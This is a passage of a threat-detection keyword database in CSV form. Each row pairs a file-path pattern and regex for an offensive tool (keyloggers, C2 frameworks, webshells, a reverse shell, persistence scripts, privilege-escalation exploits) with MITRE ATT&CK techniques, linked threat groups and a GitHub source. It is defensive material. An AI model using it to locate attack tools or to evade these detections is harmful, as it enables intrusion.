"*/peeping-tom.app*",".{0,1000}\/peeping\-tom\.app.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","#macos","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9593"
"*/peeping-tom.exe*",".{0,1000}\/peeping\-tom\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9594"
"*/peeping-tom.git*",".{0,1000}\/peeping\-tom\.git.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9595"
"*/PeerToPeerService.*",".{0,1000}\/PeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","9596"
"*/peinjector*",".{0,1000}\/peinjector.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9597"
"*/peinjector.*",".{0,1000}\/peinjector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9598"
"*/pendulum.git*",".{0,1000}\/pendulum\.git.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","9599"
"*/pentest*",".{0,1000}\/pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9600"
"*/PE-Obfuscator*",".{0,1000}\/PE\-Obfuscator.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","9601"
"*/perf_swevent64*",".{0,1000}\/perf_swevent64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9603"
"*/Perfusion.exe*",".{0,1000}\/Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9604"
"*/Perfusion.git*",".{0,1000}\/Perfusion\.git.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9605"
"*/PerfusionDll.dll*",".{0,1000}\/PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9606"
"*/Perl Web Shell by RST-GHC.pl*",".{0,1000}\/Perl\sWeb\sShell\sby\sRST\-GHC\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9608"
"*/perl-reverse-shell.pl*",".{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","9609"
"*/perlweb_shell.pl*",".{0,1000}\/perlweb_shell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9610"
"*/persist.tpl*",".{0,1000}\/persist\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9611"
"*/persist_bitsadmin.py*",".{0,1000}\/persist_bitsadmin\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9612"
"*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9613"
"*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9614"
"*/persist_dll_explorer.py*",".{0,1000}\/persist_dll_explorer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9615"
"*/persist_hkcu_run.py*",".{0,1000}\/persist_hkcu_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9616"
"*/persist_hklm_run.py*",".{0,1000}\/persist_hklm_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9617"
"*/persist_ifeo.py*",".{0,1000}\/persist_ifeo\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9618"
"*/persist_mofcomp.py*",".{0,1000}\/persist_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9619"
"*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9620"
"*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9621"
"*/persist_schtask.py*",".{0,1000}\/persist_schtask\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9622"
"*/persist_startup_files.py*",".{0,1000}\/persist_startup_files\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9623"
"*/persist_userinit.py*",".{0,1000}\/persist_userinit\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9624"
"*/persist_wmic.py*",".{0,1000}\/persist_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9625"
"*/PersistBOF/*",".{0,1000}\/PersistBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9626"
"*/Persistence.sh*",".{0,1000}\/Persistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9627"
"*/persistence/*.ps1",".{0,1000}\/persistence\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9628"
"*/persistence/*.psm1",".{0,1000}\/persistence\/.{0,1000}\.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9629"
"*/Persistence/InstallUtil.*",".{0,1000}\/Persistence\/InstallUtil\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","9630"
"*/persistence_demos.git*",".{0,1000}\/persistence_demos\.git.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","9631"
"*/persistence2.rc*",".{0,1000}\/persistence2\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9632"
"*/Persistence-Accessibility-Features.git*",".{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","9633"
"*/PersistViaScheduledTask.ahk*",".{0,1000}\/PersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","9634"
"*/persit_linux.go*",".{0,1000}\/persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","#linux","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9635"
"*/persit_windows.go*",".{0,1000}\/persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9636"
"*/peterspbr/dirty-pipe-otw*",".{0,1000}\/peterspbr\/dirty\-pipe\-otw.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z","9637"
"*/PetitPotam.exe*",".{0,1000}\/PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","9638"
"*/PetitPotam.git*",".{0,1000}\/PetitPotam\.git.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","9639"
"*/petitpotam.py*",".{0,1000}\/petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9640"
"*/PetitPotato.cpp*",".{0,1000}\/PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9641"
"*/PetitPotato.git*",".{0,1000}\/PetitPotato\.git.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9642"
"*/PetitPotato-1.0.0.zip*",".{0,1000}\/PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9643"
"*/PEzor.cna*",".{0,1000}\/PEzor\.cna.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9644"
"*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9645"
